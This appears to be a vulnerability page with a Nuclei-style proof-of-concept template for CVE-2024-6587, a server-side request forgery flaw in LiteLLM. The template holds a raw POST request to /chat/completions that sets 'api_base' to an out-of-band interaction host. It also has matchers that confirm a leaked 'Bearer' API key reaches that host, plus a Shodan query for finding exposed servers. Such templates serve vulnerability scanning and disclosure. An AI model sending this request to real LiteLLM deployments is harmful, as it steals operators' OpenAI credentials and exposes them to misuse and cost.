漏洞描述
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
CVE-2024-6587: LiteLLM - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2024-6587
info:
name: LiteLLM - Server-Side Request Forgery
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
severity: high
description: |
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
reference:
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
classification:
epss-score: 0.78552
epss-percentile: 0.99006
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:439373620
tags: cve,cve2024,ssrf,openai,litellm,vkev
http:
- raw:
- |
POST /chat/completions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"model": "command-nightly",
"messages": [
{
"content": "Hello, how are you?",
"role": "user"
}
],
"api_base": "https://{{interactsh-url}}"
}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "Bearer"
# digest: 490a00463044022043d0d9242445e5f58a0e6fc28d841f5837b342bc8cf2404e94b289f1460c127602202ab74b433f8f477acf72e4baaef9b5108da36d3f016ae04367b2c959e4374476:922c64590222798bb761d5b6d8e72950